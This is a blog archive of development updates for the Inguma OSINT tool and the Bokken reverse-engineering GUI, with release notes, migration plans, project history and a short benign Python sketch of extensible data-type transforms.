Inguma Development<br />
<h2>
Development bi-week: First issue, GTK Accelerators not working.</h2>
Published 2018-12-03<br />
<div style="text-align: justify;">
Nothing particularly exciting to report. Plenty of little things here and there, but I'm still hesitant to do major surgery.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<ul>
<li><b>Gtk.IHateGtkDebugging:</b> I have been fighting <b>for days</b> to make the accelerators in the main menu work from the very first moment, but they only work after you use the main menu <b>once</b> (see <a href="https://github.com/inguma/inguma/issues/1" target="_blank">issue #1</a>). People seem to use any combination of <i>Gtk.AccelGroup</i>, <i>Gtk.Action</i>, <i>Gio.Action</i>, <i>Gtk.UIManager</i> and <i>Gtk.Builder</i> to build their menus and I have been completely unable to get it working in GTK+3, although it worked in PyGtk.</li>
<li><b>New data types:</b> I'm trying to add IPv6 as a valid data type and remove all the automatic gather/discover modules that run right after adding it.</li>
</ul>
<div>
I'm starting in a new job, so let's see if I'm able to spend some time in Inguma in the next weeks/months!</div>
Posted by Ender<br />
<h2>
Development bi-week: GTK+3 migration, and other small big changes.</h2>
Published 2018-11-15<br />
<div style="text-align: justify;">
Welcome to the first (hopefully of many) updates on Inguma development. I've been heads-down getting again a bit more familiar with the codebase and trying to get a grasp on some of the concepts that I would like to have in an open-source intelligence tool. So far I'd say that it's been a frustrating and also a rewarding experience because I have been able to achieve big things.<br />
<br />
As a side note, I'll say that in the past I never understood very well the Inguma codebase, given its organic growth nature from the console version, and I also was not familiar with many of the security tools that it was trying to emulate or replace. It's very interesting how 6 years of working in demanding computer security roles may change your perspective.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Main highlights</h3>
<div>
<ul>
<li style="text-align: justify;">I can't believe that the migration to GTK+3 is (mostly) complete. I have been patching many files manually after running a script to do the bulk of the conversion, but as I get deeper in the code more minor issues will keep arising.</li>
<li style="text-align: justify;">The code is still Python 2.x only but I'm taking small steps to convert things to an intermediate state where the amount of <span style="font-family: Courier New, Courier, monospace;">print</span>'s and other things like that get reduced and the code uses more abstractions.</li>
<li style="text-align: justify;">External dependencies: I updated xdot.py and IPy, and I removed our local copy of <a href="https://scapy.net/">Scapy</a> from the tree. I'm determined to remove as much old cruft as I can from the local tree, some of it dating more than 9 or 10 years back.</li>
<li style="text-align: justify;">Everything from menus to buttons seems horribly broken but I'm trying to fix things as fast as I can.</li>
<li style="text-align: justify;">I added a new data type called <b>IPv6</b>. It's a first step to understand how difficult it is to make a datatype-agnostic KB and interface.</li>
</ul>
<div style="text-align: justify;">
The summary is that Inguma is in a terrible state of flux right now. The code assumes, for example, that you are going to run several if not all "gather" and "discover" modules for every IPv4 or domain that you enter, instead of letting the user trigger it manually.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I added a <a href="https://trello.com/b/KBTfqfGL/inguma" target="_blank">small Trello board</a> with some ideas, so feel free to add issues to <a href="https://github.com/inguma/inguma/issues" target="_blank">Github</a> if you have a particular feature or problem that you want us to tackle first.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Thank you for reading!</div>
Posted by Ender<br />
<h2>
Future plans for Inguma development</h2>
Published 2018-10-29<br />
<div style="text-align: justify;">
All right. After the revelations two days ago about Inguma visiting us from the grave, the next thing is to make a bucket list of what needs to be done. In a somewhat-ordered list of most to least important, this is what I'd like to accomplish:<br />
<br />
<br />
<ol style="text-align: start;">
<li style="text-align: justify;"><u>Port Inguma to GTK+3 + GObject</u>:</li>
<ul>
<li style="text-align: justify;">Inguma is written in PyGTK + GTK+2, which ceased development several years ago. GObject is the new introspection from the GTK+ project, which allows the usage of language bindings for any library using it without having to rewrite things when the library changes.</li>
<li style="text-align: justify;">This should help us keep an easier install procedure for MacOS and Windows.</li>
</ul>
<li style="text-align: justify;"><u>Port Inguma code to Python 3</u>:</li>
<ul>
<li style="text-align: justify;">While we were not looking, the world has finally moved to Python 3 and things like xdot.py are actually now GTK+3 and Python 3. This is dependent on third-party code living in the tree or external dependencies that are only in Python 2.</li>
</ul>
<li style="text-align: justify;"><u>Remove years-old cruft from the tree</u>:</li>
<ul>
<li style="text-align: justify;">Inguma has accumulated a fair amount of old code (pyew, krash, fuzz, scapy, pyshellcodelib, etc.) that is either plain old and outdated or that has been getting updates in all this time. Spring cleaning it is!</li>
</ul>
<li style="text-align: justify;"><u>Remove Bokken from Inguma</u>:</li>
<ul>
<li style="text-align: justify;">Sadly, Bokken is not usable now with radare having evolved on its own for a few years now. We will need to revisit that at a later stage.</li>
</ul>
<li style="text-align: justify;"><u>Hide functionality until it's battle-tested</u>:</li>
<ul>
<li style="text-align: justify;">In the open source world, there's always a debate about whether you should release early and often with incomplete functionality, or ship only features that work well in a variety of environments and that are not going to crush those testers with very high hopes.</li>
<li style="text-align: justify;">Given that our development time is limited, I prefer to stay with a product that shows only stable features, and instead of removing lots of code that could potentially need to be added later, for now just hide everything else behind a config or runtime flag so we don't confuse new users with broken stuff everywhere.</li>
</ul>
<li style="text-align: justify;"><u>Make documentation great again</u>:</li>
<ul>
<li style="text-align: justify;">We lost the wiki, but even if I'm able to recover it, I'm not sure if a wiki is the best way of keeping documentation updated. I'm thinking about generating it automatically for specific versions so it's easier to change and upload.</li>
</ul>
<li style="text-align: justify;"><u>Make modules...modular</u>:</li>
<ul>
<li style="text-align: justify;">The list of actions that you can make with a graph is very limited and hardcoded in <i>lib/ui/target_dialog.py</i> and <i>lib/ui/graphMenu.py</i> (if I'm not mistaken). In order to make Inguma a proper open-source intelligence client, the list of <i>transforms</i> (borrowing a term from Maltego) has to be extensible and modular, and move away from the actual node-as-IP paradigm.</li>
</ul>
<li style="text-align: justify;"><u>Ignore (or delete) the text-only Inguma client</u>:</li>
<ul>
<li style="text-align: justify;">For those of you who don't know it, Inguma started as a text-only application until Hugo built the UI in PyGTK. Having to maintain both is beyond my expectations at this moment, so if you use it and it goes and eats your grandmother, don't come whining. Take this as my one and only warning.</li>
</ul>
<li style="text-align: justify;"><u>Fix the terminals code</u>:</li>
<ul>
<li style="text-align: justify;">It's broken (or it will be) when anything of the above happens. It was already brittle and it doesn't like to be disturbed, but it's not a priority to really fix it.</li>
</ul>
</ol>
<div>
All the above said, I would like to release a couple of versions in <i>technology-preview</i> mode just to make sure that anyone who wants to test it has a good starting point.</div>
</div>
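<div style="text-align: justify;">
An added example, not code from Inguma: one way the extensible transforms and the move away from the node-as-IP paradigm described in the list above could fit together, with nothing running until the user picks a transform. Every name in it (DataType, Node, KnowledgeBase, the transform names) is hypothetical, and the transforms are offline computations built on Python 3's standard ipaddress module.</div>

```python
# Added illustration, not Inguma code: every class, function and transform name is hypothetical.
import ipaddress
from collections import defaultdict
from dataclasses import dataclass
from enum import Enum


class DataType(Enum):
    IPV4 = "ipv4"
    IPV6 = "ipv6"
    DOMAIN = "domain"


@dataclass(frozen=True)
class Node:
    dtype: DataType
    value: str


def classify(raw):
    """Turn user input into a typed node instead of assuming it is an IPv4 address."""
    text = raw.strip().rstrip(".")
    if not text:
        raise ValueError("empty target")
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return Node(DataType.DOMAIN, text.lower())
    # str(addr) is the canonical spelling, so equivalent IPv6 forms become one node.
    return Node(DataType.IPV4 if addr.version == 4 else DataType.IPV6, str(addr))


TRANSFORMS = defaultdict(dict)  # DataType -> {transform name: function}


def transform(name, *accepts):
    """Decorator: register a function as a transform for the given data types."""
    def register(func):
        for dtype in accepts:
            TRANSFORMS[dtype][name] = func
        return func
    return register


@transform("reverse-dns-name", DataType.IPV4, DataType.IPV6)
def reverse_dns_name(node):
    # Offline: only computes the PTR query name, no lookup is made.
    return [Node(DataType.DOMAIN, ipaddress.ip_address(node.value).reverse_pointer)]


@transform("embedded-ipv4", DataType.IPV6)
def embedded_ipv4(node):
    # IPv4-mapped IPv6 (::ffff:a.b.c.d) yields the IPv4 address it carries.
    mapped = ipaddress.ip_address(node.value).ipv4_mapped
    return [Node(DataType.IPV4, str(mapped))] if mapped is not None else []


@transform("parent-domain", DataType.DOMAIN)
def parent_domain(node):
    labels = node.value.split(".")
    return [Node(DataType.DOMAIN, ".".join(labels[1:]))] if len(labels) > 2 else []


class KnowledgeBase:
    def __init__(self):
        self.nodes = set()
        self.edges = set()  # (source node, transform name, result node)

    def add(self, raw):
        node = classify(raw)
        self.nodes.add(node)  # adding a target runs no transform by itself
        return node

    def available(self, node):
        return sorted(TRANSFORMS[node.dtype])

    def run(self, node, name):
        """Run one transform the user picked and record what it found."""
        if name not in TRANSFORMS[node.dtype]:
            raise KeyError(f"{name!r} does not accept {node.dtype.value} nodes")
        results = TRANSFORMS[node.dtype][name](node)
        for found in results:
            self.nodes.add(found)
            self.edges.add((node, name, found))
        return results


if __name__ == "__main__":
    kb = KnowledgeBase()
    # Constructed sample targets (documentation address ranges and example.com).
    for raw in ("2001:DB8::0001", "::ffff:192.0.2.7", "192.0.2.1", "www.Example.com."):
        node = kb.add(raw)
        for name in kb.available(node):
            print(node.value, name, [n.value for n in kb.run(node, name)])
```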
Posted by Ender<br />
<h2>
Inguma is back, and due team update</h2>
Published 2018-10-24<br />
<div style="text-align: justify;">
As we are approaching Halloween (in the United States, at least) I find it quite amusing to announce at this time of the year that Inguma is back from the dead, one more time.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you like to know the nitty-gritty details about what happened and where we are going, keep reading. Otherwise:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>TL;DR</b>: The Inguma code is now in <a href="https://github.com/inguma/inguma">Github</a>, and we are pivoting it to become a general purpose OSINT tool.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Still here? Oh, my, you seem to be of the masochistic type. Let me add some history bits about the project as well.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So...</div>
<div style="text-align: justify;">
</div>
<ul>
<li style="text-align: justify;">The development team (literally these two dummies writing the blog) is still alive. No doubt on that.</li>
<li style="text-align: justify;">We lost the server that hosted inguma.eu, bokken.re and the rest of the domains, the Mercurial repository, the wikis and everything else. We are still in control of DNS and everything but it will take the undersigned (i.e. Ender) some time to come up with a web server, mail server and the rest.</li>
<li style="text-align: justify;">Hugo and I have been very far from each other, and not exactly with a lot of time in our hands. Life changes made things more difficult. Bokken, the only piece of the project that was still moving forward, became obsolete (more on this later).</li>
<li style="text-align: justify;">I was not working as a security professional when I started helping with the project. Since then, many things have changed and I have been working as such for the last 6 years. Needless to say, I see the world in a different way now.</li>
<li style="text-align: justify;">Inguma was a project that Hugo inherited from hacker <i>extraordinaire</i> Joxean Koret, which was console-only, and which Hugo converted into a dual console-PyGTK application. Bokken, a UI around the reversing framework <a href="https://rada.re/">Radare</a>, was then started around 2011 in the same fashion (a PyGTK application) using the radare Python bindings due to radare being console-only. We saw the potential to merge it with Inguma in some way, and Bokken became the reversing engine in Inguma apart from being a standalone application.</li>
<li style="text-align: justify;">Somewhere in 2015 the Radare team expressed that they would like to use Qt and Hugo remade Bokken in a matter of weeks in C++ and Qt as a new project called <a href="https://github.com/hteso/iaito">iaito</a>. Some time later, the Radare team decided to stop using it and they adopted it into their Github repos as <a href="https://github.com/radareorg/cutter">Cutter</a>.</li>
<li style="text-align: justify;">At the same time, Inguma hadn't seen a commit since 2012. We were very focused on making Bokken a success, and working in a codebase that was as disorganized (due to its long, organic growth) as Inguma was a barrier. I wanted to add an HTTP server, proper modules, unit tests, move it to GTK+3, and many other things, but ended up putting only half of the work needed for every one of those things. A true love-hate relationship.</li>
<li style="text-align: justify;">At the same time, Hugo had started using Inguma as the base for several personal modified versions with airplane modules for his talks about airplane security (after all, he's a recognized world expert on that field). He was using it mostly as a pen-testing framework and was reasonably happy with it.</li>
<li style="text-align: justify;">So fast forward, and we then lost the server with everything.</li>
</ul>
<div>
<div style="text-align: justify;">
And then, several weeks ago, I started to look for a free software replacement for <a href="https://www.maltego.com/clients.html">Maltego</a>, the Open Source Intelligence program. And do you know what?</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<b>There's none.</b></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
I thought of using my experience with Inguma and Bokken to write something simple in GTK+3. After a couple of tries, I dug into my hard drives and I found my Inguma checkouts. I realized that I had pretty much everything I needed: a modern UI, most of the heavy work that an interface needs, and a graph engine based on Graphviz. I could just reuse some of the parts.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Long story short, I talked to Hugo and, while he seemed a bit reluctant at first, I managed to get him excited about reviving Inguma and converting it into something... different.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So that’s it. I’m dropping a lot of the old cruft in Inguma that has been outdated since 2012 or before, bringing it up to speed regarding modern codebases, removing (for now) some of the exploiting/terminals/reconnaissance UI, and adding a lot of features to be able to work as an OSINT manager.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
See you out there. It’s going to be great. </div>
</div>
Posted by Ender<br />
<h2>
Windows installer!</h2>
Published 2015-08-21<br />
This is a small blog post for a big announcement, at least if you are a Windows user! We know that installing Bokken is not the easiest task, mainly if you use Microsoft's platform; but that has just changed with the arrival of the new Bokken Windows installer!<br />
<br />
Thanks to the excellent job of <a href="https://github.com/HardcoreHacker">HardcoreHacker</a> now installing Bokken in Windows is this easy: just <a href="http://www.bokken.re/download.html" target="_blank">download</a> the new installer and it will take care of everything:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw-f2Sdie2aVZ-XSFzgbwPQOkb5QhAvufrsA7PLkMqdeMQ580be1qpYhn_bK8OArMfjfyYm7yQGSLjE8TdBJW736C77usv_noHsg5FFVp5sXl2KACOrPfDwEuka0HNx3DzH2VVagumSuNR/s1600/Bokken_installer.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw-f2Sdie2aVZ-XSFzgbwPQOkb5QhAvufrsA7PLkMqdeMQ580be1qpYhn_bK8OArMfjfyYm7yQGSLjE8TdBJW736C77usv_noHsg5FFVp5sXl2KACOrPfDwEuka0HNx3DzH2VVagumSuNR/s1600/Bokken_installer.PNG" /></a></div>
<br />
<br />
<div style="text-align: justify;">
The installer will also take care of Bokken's dependencies and will ask you to install Python and PyGtk in case it's needed. And that's all, folks, Bokken successfully installed!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0sXJDXTOzviJS6n_zuoVqAHdL-XfLVee6_3DocO3OZrdccfssgbsG-Ioe2-uCpjlolT5qmJn6VhtMxpUWdYjIpvLGKyNkpzMD8LtR7YDXONXYL6_eewzxk6n13cLIQhTdmh4zKOVFFe6H/s1600/Bokken_installer_end.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0sXJDXTOzviJS6n_zuoVqAHdL-XfLVee6_3DocO3OZrdccfssgbsG-Ioe2-uCpjlolT5qmJn6VhtMxpUWdYjIpvLGKyNkpzMD8LtR7YDXONXYL6_eewzxk6n13cLIQhTdmh4zKOVFFe6H/s1600/Bokken_installer_end.PNG" /></a></div>
<br />
<br />
Just a few clicks and Bokken's icon will be on your desktop waiting for you to launch it!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTydyYf8oy3EziCNPSV59Bh22oBbIJFs5eQGjcTgWGjqHNE7FjXVSL7wS2Wal3vWQmZ_nopmu44IkbfO6sG6HSleZyAQaoF3vL1zGfiu9kVj_LdXAb3yqEdlxN7E7a33O5e0vU7rOGLbnR/s1600/Bokken_windows.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTydyYf8oy3EziCNPSV59Bh22oBbIJFs5eQGjcTgWGjqHNE7FjXVSL7wS2Wal3vWQmZ_nopmu44IkbfO6sG6HSleZyAQaoF3vL1zGfiu9kVj_LdXAb3yqEdlxN7E7a33O5e0vU7rOGLbnR/s400/Bokken_windows.PNG" width="400" /></a></div>
<br />
<br />
The installer has been tested in the following Windows versions:<br />
<div>
<ul>
<li>Windows XP x86</li>
<li>Windows 7 x86_64</li>
<li>Windows 10 x86_64</li>
</ul>
</div>
If you encounter any problem, just <a href="http://www.bokken.re/contact.html" target="_blank">let us know</a> and we will fix it as soon as possible.<br />
<br />
Now just go, <a href="http://www.bokken.re/download.html" target="_blank">download</a> Bokken and enjoy it in your favorite platform!<br />
Posted by hteso<br />
<h2>
Bokken 1.8</h2>
Published 2015-06-10<br />
It has been just one month and we are back with a new release of Bokken, 1.8 is here! This release was meant to be a minor one, with just support for the latest radare2 version but... look at it by yourself:<br />
<h3>
Bye, bye, pyew</h3>
Bokken started as a UI for pyew and radare2, and we tried hard to maintain both backends in our development. Sadly, pyew moves very slowly and has a different set of skills than radare, so although it's a tough move, we decided to strip down all pyew functionality from Bokken altogether. Given that there's nothing else in the OSS world that fulfills this niche, we will be tied to r2 for a while. Maybe it's for the best, as the deletion allowed us to clean <b>a lot</b> of old cruft and compatibility code that has been in Bokken for ages.<br />
<br />
<h3>
radare2 0.9.9</h3>
As always, if a new radare2 version is released then we update Bokken to work with it! Bokken 1.8 works perfectly with (and <b><span style="color: orange;">ONLY with</span></b>) radare2 0.9.9.<br />
<br />
<h3>
Sections tab</h3>
In an effort to better organize the UI we have moved the Sections information to a new tab in the right panels. More work will be done for future releases to make it better.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibSvznpUyskvsIUzV_mtpRr-H3e8q24CqqAnNwnNJwmte3QIp-6wObjA7ZCh8kgNelNUAs4LpzixLJ7LtC63YoVdAtV4dJZBbSsCzM7dRcjDVu9Tu8oS4ivnVubG1FrtgFOGmshkDeg71b/s1600/sections_tab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibSvznpUyskvsIUzV_mtpRr-H3e8q24CqqAnNwnNJwmte3QIp-6wObjA7ZCh8kgNelNUAs4LpzixLJ7LtC63YoVdAtV4dJZBbSsCzM7dRcjDVu9Tu8oS4ivnVubG1FrtgFOGmshkDeg71b/s640/sections_tab.png" width="640" /></a></div>
<br />
<h3>
Simplified file info tab</h3>
<div>
Most of the contents of the File Info tab were duplicated and, being honest, useless. So we have decided to remove most of the contents, leave only the useful ones and present them in a better way.</div>
<div>
<br />
<h3>
Removed string repr tab</h3>
<div>
Time has arrived to say goodbye to this useless tab. Farewell!</div>
<div>
<br />
<h3>
New relocs side panel</h3>
</div>
<div>
After moving the Sections panel to the right we decided to use the space for a new and very useful panel: Relocs!</div>
<br />
<h3>
New strings tab</h3>
</div>
<div>
The Strings tab has gone under a complete remake and now it looks better and is easier to use.</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU4HqcCpgMTS5YWZe0gKyvvaZxpUw647m0lSfJqWrjCjORGjBqz4i0t4Cl3ZL5m8eIXIQWlGSwat96KRcfbTd6F4Qv_0ynW574RpUFrkpHWawAGSgfqUHRgnlPXw4E-KMxzV9xkhKJBK8s/s1600/Strings_relocs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU4HqcCpgMTS5YWZe0gKyvvaZxpUw647m0lSfJqWrjCjORGjBqz4i0t4Cl3ZL5m8eIXIQWlGSwat96KRcfbTd6F4Qv_0ynW574RpUFrkpHWawAGSgfqUHRgnlPXw4E-KMxzV9xkhKJBK8s/s640/Strings_relocs.png" width="640" /></a></div>
<br />
<h3>
New radare2 console</h3>
</div>
<div>
If you look at the above picture, you may spot an area in the lower section of the UI. Say goodbye to the Interactive tab and welcome the brand new radare2 console! Way easier to use than the previous one, you can find it as a new bottom panel that can be resized and hidden.</div>
<div>
<br /></div>
<h3>
New Python console</h3>
<div>
There is more: Python! Either love it or hate it, but we finally added a Python console to Bokken! Located in the new bottom panel it exports Bokken and radare2 objects such as the radare2 RCore instance, RBin and most of the data gathered by Bokken. Expect some tutorials as we polish that feature.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJbMJSbYQVyo9bN6N0_SuAU4dVhWPCF6Rmp-xzAoarVvXFVaCa7aTdFshF14WLw75L4J7H_9adtgGyONxvudxho5h1PSug8MRi1yuNAjdRqsxaWBFQhf4Tvz3KyUJ37M3paz_sXIrq7R2w/s1600/Python_file_info.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJbMJSbYQVyo9bN6N0_SuAU4dVhWPCF6Rmp-xzAoarVvXFVaCa7aTdFshF14WLw75L4J7H_9adtgGyONxvudxho5h1PSug8MRi1yuNAjdRqsxaWBFQhf4Tvz3KyUJ37M3paz_sXIrq7R2w/s640/Python_file_info.png" width="640" /></a></div>
<br />
<br />
<h2 style="text-align: center;">
<b><a href="http://bokken.re/download.html">Download Bokken 1.8 today!</a></b></h2>
Posted by hteso<br />
<h2>
Welcome Bokken 1.7</h2>
Published 2015-05-05<br />
Yes, we know, it has been a very long time since the last release and most of you thought that the project was dead. I am happy to be able to say that it was not dead, just taking a long nap. And now we are back and with a new Bokken release!<br />
<br />
Bokken 1.7 is here and though it is not a major release it still has some nice new features and improvements; let's see them, shall we?<br />
<br />
<h3>
radare2 0.9.8</h3>
<br />
Bokken 1.7 has been updated to work with the latest <a href="http://rada.re/" target="_blank">radare2</a> stable release (<a href="http://radare.today/radare-0-9-8/" target="_blank">0.9.8</a>), and it benefits from all the improvements and stabilization that is offered by that great software.<br />
<br />
That was one of the most demanded features and we are happy to finally have Bokken running smoothly with the last radare2. We will do our best to keep supporting the latest releases!<br />
<br />
<h3>
Improved graphs</h3>
<br />
The graphs have been improved in both functionality and appearance. They now work better and look really nice! Did you notice the small graph preview on the lower right corner?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF4rgxGlxu8IdlazOfMwyaCe6NFyLeLdTUwchxTLc04U_suSYqMWe2SmVbQDvRrIfasxfyiMV3UAU_8Kuf2LfmKbQbzslZ6Ckxo3QDvQah3Gajf_J3caY4l_xt2NpaPd_fRlxypP0l7v3U/s1600/graph_view_xrefs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="329" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF4rgxGlxu8IdlazOfMwyaCe6NFyLeLdTUwchxTLc04U_suSYqMWe2SmVbQDvRrIfasxfyiMV3UAU_8Kuf2LfmKbQbzslZ6Ckxo3QDvQah3Gajf_J3caY4l_xt2NpaPd_fRlxypP0l7v3U/s1600/graph_view_xrefs.png" width="640" /></a></div>
<br />
<br />
<h3>
Word highlight</h3>
<br />
This new feature makes it easy to follow the code by highlighting all the words like the one the cursor is placed on. Useful to, for example, find all the <i>"call"</i> in a function or follow that register that contains important data!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSZ1qhwgcZc4nov_y9_iu1ea14fTc3pYB_QGntAhGaYke_fwu9FxdTabMr2wQqOpEK9lv2XXX_c43FsENkhlFN4JO1EtAN6ZD13hi9paOCIskzbEApKZcik09xSJvUWSNy9By70H_JEN6E/s1600/code_view_dark_seek.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSZ1qhwgcZc4nov_y9_iu1ea14fTc3pYB_QGntAhGaYke_fwu9FxdTabMr2wQqOpEK9lv2XXX_c43FsENkhlFN4JO1EtAN6ZD13hi9paOCIskzbEApKZcik09xSJvUWSNy9By70H_JEN6E/s1600/code_view_dark_seek.png" width="640" /></a></div>
<br />
<br />
<h3>
ARM support</h3>
<br />
Although Bokken can open and analyze any format supported by radare2, interactivity and syntax highlighting now also works with ARM binaries! We will keep adding more in future releases; any preference? Let us know!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis7epSr2I1Yz1OvO2kMmCAiRqxte0gpF0LQmCnSCjQSXdO_qOd8t7uwzRt3jHehUZqz8IwGUh2jmJi58DnuBpW_wLQxxxJq9mok7U1ZBLdVElC9NJO5AEmFbqqxbhbAISsiNuWIKkzcz_g/s1600/bokken-arm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis7epSr2I1Yz1OvO2kMmCAiRqxte0gpF0LQmCnSCjQSXdO_qOd8t7uwzRt3jHehUZqz8IwGUh2jmJi58DnuBpW_wLQxxxJq9mok7U1ZBLdVElC9NJO5AEmFbqqxbhbAISsiNuWIKkzcz_g/s1600/bokken-arm.png" width="640" /></a></div>
<br />
<br />
<h3>
Bindiff fixed and improved</h3>
<br />
Working better than ever and with more visual enhancements, Bokken's binary diffing is now way better!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijbnNX9y7hyQIBMIXDOnj-hzNKKN4E8I1h-QAO10rGbMJQJxokSG9WXWHyC2zYRlE_STNLFpEQZ51YqoT1VdVHO6wPc06sAQlhfytazsA50jNz1l_ug-8V4sH2rRLKH3r6qAj1l-3Cy1Dr/s1600/bindiff_graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijbnNX9y7hyQIBMIXDOnj-hzNKKN4E8I1h-QAO10rGbMJQJxokSG9WXWHyC2zYRlE_STNLFpEQZ51YqoT1VdVHO6wPc06sAQlhfytazsA50jNz1l_ug-8V4sH2rRLKH3r6qAj1l-3Cy1Dr/s1600/bindiff_graph.png" width="640" /></a></div>
<br />
<br />
<h3>
More analysis options</h3>
<br />
This new release supports more binary analysis options offered by radare2, so in the initial dialog it is now possible to choose... well, better look at them by yourself! Can you spot the new ones? ;)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXDluvTGHSyJgQ-CZ-vKJFBxm9kP-r_riG763uI11U1oLDb_AFlxz3IDokmNTOYH0xAe-asMBd70wcAwJf0E6UOKG1paBsDx79xtZsV6tOS6QL6kzcNxTRwlLTHKX0NciR7n4Aywsgy3Au/s1600/options_dialog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXDluvTGHSyJgQ-CZ-vKJFBxm9kP-r_riG763uI11U1oLDb_AFlxz3IDokmNTOYH0xAe-asMBd70wcAwJf0E6UOKG1paBsDx79xtZsV6tOS6QL6kzcNxTRwlLTHKX0NciR7n4Aywsgy3Au/s1600/options_dialog.png" width="223" /></a></div>
<br />
<br />
<h3>
Tooltips!</h3>
<br />
Tooltips everywhere! Place the mouse over an address, function or symbol and a tooltip will pop up with a brief disassembly. But not just that, same functionality can be found in the functions list on the left panel, no need to move to a function to take a quick look.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8CdwKRyJ9JAhR3TyPeYDY3tyPSu-xeM2kUZlH6llhCQkr15A2OkrWDnz2KnBko4heVMIJyOjl_axEhyWalmJO9MhGJIRq_WHIDA6vUAEB4NRA2CmgBpqLEGV2YeT6Avxt2BjxxTy111qm/s1600/code_view_tooltip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8CdwKRyJ9JAhR3TyPeYDY3tyPSu-xeM2kUZlH6llhCQkr15A2OkrWDnz2KnBko4heVMIJyOjl_axEhyWalmJO9MhGJIRq_WHIDA6vUAEB4NRA2CmgBpqLEGV2YeT6Avxt2BjxxTy111qm/s1600/code_view_tooltip.png" width="640" /></a></div>
<br />
<br />
<h3>
Download and enjoy</h3>
<br />
Not bad for a minor release, right? Good, because that's not all, we still have one last thing:<br />
<br />
<div style="text-align: center;">
<b><span style="color: #3d85c6; font-size: large;">A brand new project domain and website!</span></b></div>
<br />
No screenshot this time! If you want to view it then go to the <a href="http://bokken.re/" target="_blank">new website</a> and further explore the new release. We hope that you decide to download and try it by yourself.<br />
<br />
If you feel in the mood, go by the development site and give us <a href="http://bokken.re/contact.html" target="_blank">feedback</a> to further improve Bokken. And don't forget to follow the project in <a href="https://twitter.com/ingumito" target="_blank">Twitter</a> to get all the project news.<br />
<br />
Happy reversing!<br />
<br />
<br />
<br />
<br />
<br />
Posted by hteso<br />
<h2>
Debian radare2 0.9.6 published and broken Bokken.</h2>
Published 2014-01-01<br />
<div style="text-align: justify;">
